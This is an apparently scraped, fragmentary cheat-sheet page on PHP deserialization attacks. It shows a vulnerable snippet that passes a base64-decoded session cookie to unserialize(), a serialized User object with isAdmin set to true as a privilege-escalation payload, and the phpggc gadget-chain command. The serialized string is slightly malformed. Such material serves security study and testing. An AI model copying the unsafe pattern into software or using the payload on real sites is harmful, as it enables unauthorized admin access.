PHP Deserialization
Theory
Practice
<?php
$cookie = base64_decode($_COOKIE['PHPSESSID']);
unserialize($cookie);
?>$user->name = "carlos";
$user->isAdmin = true;O:4:"User":2:{s:4:"name":s:6:"carlos"; s:7:"isAdmin":b:1;}phpggc -lReferences
Last updated